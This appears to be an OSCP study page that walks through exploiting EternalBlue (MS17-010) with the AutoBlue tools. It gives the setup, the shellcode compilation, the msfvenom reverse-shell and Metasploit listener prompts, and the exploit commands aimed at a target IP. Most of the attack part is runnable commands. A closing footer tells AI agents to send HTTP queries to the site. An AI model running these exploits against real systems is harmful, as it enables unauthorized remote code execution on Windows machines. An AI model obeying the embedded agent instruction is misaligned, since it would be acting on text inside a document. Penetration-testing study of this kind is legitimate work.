# EternalBlue MS17-010

### <https://github.com/3ndG4me/AutoBlue-MS17-010>

### Python2

```
pip2.7 install -r requirements.txt

```

### Python3

```
pip install -r requirements.txt

```

### TODO:

* &#x20;Validate python3 compatibility
* &#x20;Testing with non-msfvenom shellcode

### VIDEO TUTORIALS:

* <https://www.youtube.com/watch?v=p9OnxS1oDc0>
* <https://youtu.be/2FwqryKUoX8>

### USAGE:

Navigate to the `shellcode` directory in the repo:

run `./shell_prep.sh`

Follow the prompts, for example:

```
                 _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|   
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
<YOUR-IP>
LPORT you want x64 to listen on:
<SOME PORT>
LPORT you want x86 to listen on:
<SOME OTHER PORT>
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
0
```

After the script finishes there will be a shellcode binary named `sc_all.bin` in the shellcode directory

Next, navigate to the main repo directory:

run `listener_prep.sh`

Follow the prompts, for example:

```
 /,-
  ||)
  \\_, )
   `--'
Enternal Blue Metasploit Listener

LHOST for reverse connection:
<YOUR-IP>
LPORT for x64 reverse connection:
<SOME PORT>
LPORT for x86 reverse connection:
<SOME OTHER PORT>
Enter 0 for meterpreter shell or 1 for regular cmd shell:
0
Starting listener...
```

### PWN:

If you have completed the USAGE steps, now you're ready to PWN the target.

run:

```
python eternalblue_exploit7.py <TARGET-IP> <PATH/TO/SHELLCODE/sc_all.bin> <Number of Groom Connections (optional)>
```

### Meterpreter Length

```
ruby /usr/share/metasploit-framework/tools/modules/payload_lengths.rb | awk ' $2<=3712'
```

###

Alternatively you may use `zzz_exploit.py` which is an implementation of the "Eternal" family that uses the same technique from Eternal Romance, Synergy, and Champion.

This is not setup to send back a reverse shell or execute any sort of payload like Eternal Blue is. This uses the functions from mysmb.py to spawn a semi-interactive cmd shell. There are commented out sections of code that can be modified to interact with metasploit or send of custom payloads using the `service_exec()` function call.

All of the code execution functionality can be found in the `do_system_mysmb_session()` function.

This version of the exploit is great for targeting systems that have named pipes available to avoid crashing the target.

run:

`python zzz_exploit.py <TARGET-IP>`

Enternal Blue has only been tested on Windows 7/Server 2008, and Windows 10 10240 (x64)

zzz has only been tested on Windows XP

However the Eternal Blue exploits included in this repo also include support for Windows 8/Server 2012 and *should* work.

The zzz exploit should also work on all targets provided you have access to a named pipe. For some OS's (Windows 10) this may also require credentials of a user who can access this named pipe (This is because on newer versions, Guest and NULL sessions are not supported out of the box).

The original exploit code that this repo pulls from is located here: <https://github.com/worawit/MS17-010>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rabakuku.gitbook.io/oscp/windows/eternalblue-ms17-010.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.